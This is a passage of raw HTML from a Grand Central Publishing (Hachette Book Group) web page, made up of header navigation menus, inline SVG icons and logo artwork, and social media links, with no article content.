<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1501588571  desc-arrow-2662037999">
	<title id="titlet-arrow-1501588571">Arrow Icon</title>
	<desc id="desc-arrow-2662037999">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-1982454462" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1982454462" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1982454462" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4102665062  desc-arrow-3937371843">
	<title id="titlet-arrow-4102665062">Arrow Icon</title>
	<desc id="desc-arrow-3937371843">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-672300543" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-672300543" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-672300543" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2988744546  desc-arrow-2935763337">
	<title id="titlet-arrow-2988744546">Arrow Icon</title>
	<desc id="desc-arrow-2935763337">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-2071998160" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-2071998160" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-2071998160" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3703464775  desc-arrow-1536086517">
	<title id="titlet-arrow-3703464775">Arrow Icon</title>
	<desc id="desc-arrow-1536086517">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-654631719" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-654631719" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-654631719" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3146197545  desc-arrow-2837648667">
	<title id="titlet-arrow-3146197545">Arrow Icon</title>
	<desc id="desc-arrow-2837648667">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-1432489759" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1432489759" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1432489759" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2021776775  desc-arrow-1455174170">
	<title id="titlet-arrow-2021776775">Arrow Icon</title>
	<desc id="desc-arrow-1455174170">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1432489759" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1432489759"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-323971217" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-323971217" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-323971217" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1754856618  desc-arrow-1307476358">
	<title id="titlet-arrow-1754856618">Arrow Icon</title>
	<desc id="desc-arrow-1307476358">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-323971217" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-323971217"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-532460757" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-532460757" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-532460757" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-357163070  desc-arrow-3410417451">
	<title id="titlet-arrow-357163070">Arrow Icon</title>
	<desc id="desc-arrow-3410417451">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-532460757" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-532460757"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></div>	</nav>
</header>

<header id="site-header" class="site-header imprint-header grand-central-publishing">
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
		
	<a class="site-header__branding--imprint-header-logo__desktop" href="https://www.grandcentralpublishing.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.cls-1{fill:#ef4529;}</style></defs><title>grand-central-publishing</title><path class="cls-1" d="M69.59,3.61c-6,.29-12.32,1.91-12.25,8.43s6.8,8.57,13.1,8.5c5-.07,10.77-1.35,11.83-4.11H73.91V12H94.52v4.11H86.8v8.07H82.41V21.46c-3.4,1.84-5.81,2.83-13,2.9-8.22,0-17.14-4.32-17.07-12.53S61.66,0,70,0A26.17,26.17,0,0,1,82.34,2.69V.28h4.18V9.21h-3.9C81.14,5.38,75.12,3.4,69.59,3.61ZM69,42.28c-5.87-.07-12.46,2.34-12.32,8.79.21,6,7.44,8.28,13.46,8.21,6.3-.14,11-1.49,12.6-6.66h3.69c-.14,7.09-8,10.7-16.36,10.63-8.57-.07-18.21-3.68-18.28-12.33C51.6,42.64,60.24,38.53,69,38.67c5.81.07,7.58.78,12.61,3.19V39h4.82v8.93H81.92C80.36,44.48,76.39,42.43,69,42.28ZM46.15,29.39H86.66V33.5H46.15ZM.11,77.27a5.14,5.14,0,0,1,5.1-5.17h.14a5.63,5.63,0,0,1,4,1.42L7.9,75.22a3.31,3.31,0,0,0-2.62-1,3.16,3.16,0,0,0-.07,6.3h.21A4,4,0,0,0,7.48,80V78.55H5.28V76.63H9.67v4.25a6.32,6.32,0,0,1-4.32,1.56A5,5,0,0,1,.11,77.63Zm14.17-5.1h4.6a4,4,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3.08,3.08,0,0,1-2.12,3.12L23,82.16H20.44L18.31,79h-1.7v3.26H14.28Zm4.39,4.89c1.06,0,1.7-.57,1.7-1.42s-.64-1.41-1.7-1.41h-2.2v2.9Zm11.68-5h2.06l4.32,10.13H34.39L33.47,80H29.22l-.92,2.27H26Zm2.34,6-1.34-3.26L30,78.05Zm7.65-5.88h2l4.68,6.16V72.17h2.19V82.23H47.42l-4.88-6.37v6.37h-2.2Zm13.81,0h3.9c3.18,0,5.31,2.13,5.31,5a5,5,0,0,1-5.31,5h-3.9Zm3.9,8.08a2.85,2.85,0,0,0,3-2.62v-.36a2.91,2.91,0,0,0-2.76-3h-2v6ZM72.42,77a5,5,0,0,1,5-5.17h.22a5.2,5.2,0,0,1,4,1.56L80.22,75a3.44,3.44,0,0,0-2.55-1.14,3,3,0,0,0-2.91,3V77a3,3,0,0,0,2.83,3.11h.08a3.4,3.4,0,0,0,2.62-1.2l1.41,1.42a5.06,5.06,0,0,1-4.11,1.77,5.12,5.12,0,0,1-5.17-5Zm13.18-5.1h7.58v2H87.79v2h4.75v2H87.79V80h5.46v2H85.6V71.89Zm12.39,0h2.06l4.74,6.16V71.89H107V82h-1.84l-4.89-6.38V82h-2.2L98,71.89Zm15.94,2h-3.05V71.82h8.29v2.05h-3v8h-2.19v-8Zm9.28-2h4.6a3.92,3.92,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3,3,0,0,1-2.12,3.11l2.48,3.62h-2.55l-2.13-3.19h-1.77v3.19h-2.19l-.07-10Zm4.39,4.82c1.06,0,1.7-.57,1.7-1.42s-.64-1.42-1.77-1.42h-2.2v2.91l2.27-.07Zm11.61-4.82h2.06L145.59,82h-2.34l-.92-2.27h-4.25L137.16,82h-2.27Zm2.34,5.88-1.34-3.26-1.35,3.26Zm7.23-5.88H151v8h5v2h-7.22v-10ZM29.5,89.17h3a2.53,2.53,0,0,1,2.83,2.55c0,1.7-1.34,2.62-3,2.62H31.2v2.2H29.57V89.17Zm2.91,3.75a1.12,1.12,0,0,0,1.27-1v-.14c0-.71-.49-1.13-1.34-1.13H31.06v2.26Zm5.81.5V89.17h1.62v4.18c0,1.2.64,1.84,1.63,1.84s1.63-.57,1.63-1.77V89.17h1.63v4.18a3,3,0,0,1-3.26,3.33,2.94,2.94,0,0,1-3.25-3.26Zm9.84-4.25h3.47a2.59,2.59,0,0,1,1.91.64,1.46,1.46,0,0,1,.5,1.27,1.73,1.73,0,0,1-1,1.63,1.88,1.88,0,0,1,1.41,1.84c0,1.35-1.13,2.06-2.76,2.06H48.06Zm3.12,3c.7,0,1.2-.22,1.2-.78s-.35-.78-1.06-.78H49.69v1.56Zm.42,3c.71,0,1.13-.21,1.13-.85s-.35-.78-1.2-.78H49.69v1.63Zm5.95-6h1.63v6h3.75v1.49H57.62Zm8.64,0h1.63v7.44H66.19Zm5,6.52,1-1.21a3.24,3.24,0,0,0,2.2.92c.63,0,1.06-.28,1.06-.7s-.28-.64-1.49-.93c-1.49-.35-2.48-.77-2.48-2.26a2.34,2.34,0,0,1,2.62-2.27,4.84,4.84,0,0,1,2.77.92L76,91.37a3.69,3.69,0,0,0-1.92-.71c-.63,0-.92.28-.92.64s.29.63,1.63,1,2.34.92,2.34,2.19c0,1.49-1.13,2.34-2.76,2.34A4.32,4.32,0,0,1,71.15,95.69Zm9.28-6.52h1.63v2.9h3v-3h1.63v7.51H85.1v-3h-3v3H80.43Zm9.7,0h1.63v7.44H90.13Zm5.45,0h1.49l3.47,4.6v-4.6h1.63v7.44h-1.41l-3.62-4.75v4.75H95.51Zm9.57,3.9a3.79,3.79,0,0,1,3.75-3.83H109A3.74,3.74,0,0,1,112,90.3l-1,1.21a2.44,2.44,0,0,0-2-.71,2.35,2.35,0,0,0,0,4.67h.14a3,3,0,0,0,1.56-.42V94H109V92.57h3.26v3.26a4.68,4.68,0,0,1-3.19,1.2,3.67,3.67,0,0,1-3.89-3.54A1.5,1.5,0,0,1,105.15,93.07Z"/></svg>
	</a>
	<a class="site-header__branding--imprint-header-logo__mobile" href="https://www.grandcentralpublishing.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.gcpmobile-cls-1{fill:#ef4529;}</style></defs><title>grand-central-publishing</title><path class="gcpmobile-cls-1" d="M69.59,3.61c-6,.29-12.32,1.91-12.25,8.43s6.8,8.57,13.1,8.5c5-.07,10.77-1.35,11.83-4.11H73.91V12H94.52v4.11H86.8v8.07H82.41V21.46c-3.4,1.84-5.81,2.83-13,2.9-8.22,0-17.14-4.32-17.07-12.53S61.66,0,70,0A26.17,26.17,0,0,1,82.34,2.69V.28h4.18V9.21h-3.9C81.14,5.38,75.12,3.4,69.59,3.61ZM69,42.28c-5.87-.07-12.46,2.34-12.32,8.79.21,6,7.44,8.28,13.46,8.21,6.3-.14,11-1.49,12.6-6.66h3.69c-.14,7.09-8,10.7-16.36,10.63-8.57-.07-18.21-3.68-18.28-12.33C51.6,42.64,60.24,38.53,69,38.67c5.81.07,7.58.78,12.61,3.19V39h4.82v8.93H81.92C80.36,44.48,76.39,42.43,69,42.28ZM46.15,29.39H86.66V33.5H46.15ZM.11,77.27a5.14,5.14,0,0,1,5.1-5.17h.14a5.63,5.63,0,0,1,4,1.42L7.9,75.22a3.31,3.31,0,0,0-2.62-1,3.16,3.16,0,0,0-.07,6.3h.21A4,4,0,0,0,7.48,80V78.55H5.28V76.63H9.67v4.25a6.32,6.32,0,0,1-4.32,1.56A5,5,0,0,1,.11,77.63Zm14.17-5.1h4.6a4,4,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3.08,3.08,0,0,1-2.12,3.12L23,82.16H20.44L18.31,79h-1.7v3.26H14.28Zm4.39,4.89c1.06,0,1.7-.57,1.7-1.42s-.64-1.41-1.7-1.41h-2.2v2.9Zm11.68-5h2.06l4.32,10.13H34.39L33.47,80H29.22l-.92,2.27H26Zm2.34,6-1.34-3.26L30,78.05Zm7.65-5.88h2l4.68,6.16V72.17h2.19V82.23H47.42l-4.88-6.37v6.37h-2.2Zm13.81,0h3.9c3.18,0,5.31,2.13,5.31,5a5,5,0,0,1-5.31,5h-3.9Zm3.9,8.08a2.85,2.85,0,0,0,3-2.62v-.36a2.91,2.91,0,0,0-2.76-3h-2v6ZM72.42,77a5,5,0,0,1,5-5.17h.22a5.2,5.2,0,0,1,4,1.56L80.22,75a3.44,3.44,0,0,0-2.55-1.14,3,3,0,0,0-2.91,3V77a3,3,0,0,0,2.83,3.11h.08a3.4,3.4,0,0,0,2.62-1.2l1.41,1.42a5.06,5.06,0,0,1-4.11,1.77,5.12,5.12,0,0,1-5.17-5Zm13.18-5.1h7.58v2H87.79v2h4.75v2H87.79V80h5.46v2H85.6V71.89Zm12.39,0h2.06l4.74,6.16V71.89H107V82h-1.84l-4.89-6.38V82h-2.2L98,71.89Zm15.94,2h-3.05V71.82h8.29v2.05h-3v8h-2.19v-8Zm9.28-2h4.6a3.92,3.92,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3,3,0,0,1-2.12,3.11l2.48,3.62h-2.55l-2.13-3.19h-1.77v3.19h-2.19l-.07-10Zm4.39,4.82c1.06,0,1.7-.57,1.7-1.42s-.64-1.42-1.77-1.42h-2.2v2.91l2.27-.07Zm11.61-4.82h2.06L145.59,82h-2.34l-.92-2.27h-4.25L137.16,82h-2.27Zm2.34,5.88-1.34-3.26-1.35,3.26Zm7.23-5.88H151v8h5v2h-7.22v-10ZM29.5,89.17h3a2.53,2.53,0,0,1,2.83,2.55c0,1.7-1.34,2.62-3,2.62H31.2v2.2H29.57V89.17Zm2.91,3.75a1.12,1.12,0,0,0,1.27-1v-.14c0-.71-.49-1.13-1.34-1.13H31.06v2.26Zm5.81.5V89.17h1.62v4.18c0,1.2.64,1.84,1.63,1.84s1.63-.57,1.63-1.77V89.17h1.63v4.18a3,3,0,0,1-3.26,3.33,2.94,2.94,0,0,1-3.25-3.26Zm9.84-4.25h3.47a2.59,2.59,0,0,1,1.91.64,1.46,1.46,0,0,1,.5,1.27,1.73,1.73,0,0,1-1,1.63,1.88,1.88,0,0,1,1.41,1.84c0,1.35-1.13,2.06-2.76,2.06H48.06Zm3.12,3c.7,0,1.2-.22,1.2-.78s-.35-.78-1.06-.78H49.69v1.56Zm.42,3c.71,0,1.13-.21,1.13-.85s-.35-.78-1.2-.78H49.69v1.63Zm5.95-6h1.63v6h3.75v1.49H57.62Zm8.64,0h1.63v7.44H66.19Zm5,6.52,1-1.21a3.24,3.24,0,0,0,2.2.92c.63,0,1.06-.28,1.06-.7s-.28-.64-1.49-.93c-1.49-.35-2.48-.77-2.48-2.26a2.34,2.34,0,0,1,2.62-2.27,4.84,4.84,0,0,1,2.77.92L76,91.37a3.69,3.69,0,0,0-1.92-.71c-.63,0-.92.28-.92.64s.29.63,1.63,1,2.34.92,2.34,2.19c0,1.49-1.13,2.34-2.76,2.34A4.32,4.32,0,0,1,71.15,95.69Zm9.28-6.52h1.63v2.9h3v-3h1.63v7.51H85.1v-3h-3v3H80.43Zm9.7,0h1.63v7.44H90.13Zm5.45,0h1.49l3.47,4.6v-4.6h1.63v7.44h-1.41l-3.62-4.75v4.75H95.51Zm9.57,3.9a3.79,3.79,0,0,1,3.75-3.83H109A3.74,3.74,0,0,1,112,90.3l-1,1.21a2.44,2.44,0,0,0-2-.71,2.35,2.35,0,0,0,0,4.67h.14a3,3,0,0,0,1.56-.42V94H109V92.57h3.26v3.26a4.68,4.68,0,0,1-3.19,1.2,3.67,3.67,0,0,1-3.89-3.54A1.5,1.5,0,0,1,105.15,93.07Z"/></svg>
	</a>
	<meta itemprop="publisher" content="Grand Central Publishing" />
		</h2>

	<ul class="site-header__social">
					<li class="site-header__social-header">
				Follow Us			</li>
							<li class="site-header__social-list-item">
					<a href="https://www.facebook.com/GrandCentralPub" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-3337421421  desc-facebook-icon-1217288139">
	<title id="title-facebook-icon-3337421421">Facebook Icon</title>
	<desc id="desc-facebook-icon-1217288139">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://twitter.com/GrandCentralPub" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-1848206685  desc-twitter-icon-1509429087">
	<title id="title-twitter-icon-1848206685">Twitter Icon</title>
	<desc id="desc-twitter-icon-1509429087">Twitter Logo</desc>
	<path role="presentation" role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://www.instagram.com/grandcentralpub/" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-2246533964  desc-ig-icon-4235047206">
	<title id="title-ig-icon-2246533964">Instagram Icon</title>
	<desc id="desc-ig-icon-4235047206">Instagram Icon</desc>
	<rect role="presentation" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="http://grandcentralpub.tumblr.com/" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Tumblr"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 60 60" role="img" aria-labelledby="title-tumblr-icon-2216906290  desc-tumblr-icon-4210740870">
	<title id="title-tumblr-icon-2216906290">Tumbler Icon</title>
	<desc id="desc-tumblr-icon-4210740870">Tumbler Icon</desc>
	<path class="cls-1" d="M30,60A30,30,0,1,0,0,30,30,30,0,0,0,30,60Zm0-47v9H38.1v5.77H30v8.14a14.12,14.12,0,0,0,.31,3.83A2.61,2.61,0,0,0,31.5,41a4.9,4.9,0,0,0,2.59.68A9.27,9.27,0,0,0,39.23,40v5.41c-.25.12-.81,1.87-6.63,1.87-9.44,0-9.44-6.65-9.44-8.22V27.69H18.5v-5.6a8.6,8.6,0,0,0,3.17-1.8A9.39,9.39,0,0,0,24,17.34a15.15,15.15,0,0,0,1.19-4.64H30Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://www.youtube.com/channel/UCvUxnjFAd57CcM25e95K6Qg" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="YouTube"
					>
						
<svg data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49 48.9" role="img" aria-labelledby="title-search-icon-1545418233  desc-search-icon-3826563704"><defs>
<style>.youtube-youtube-cls-1{fill:#fff;}</style></defs>
<title id="title-search-icon-1545418233">Youtube Icon</title>
<desc id="desc-search-icon-3826563704">YouTube Logo</desc>
<polygon role="presentation" class="youtube-cls-1" points="21.9 20.45 21.9 27.75 28.7 24.15 25 22.15 21.9 20.45"/>
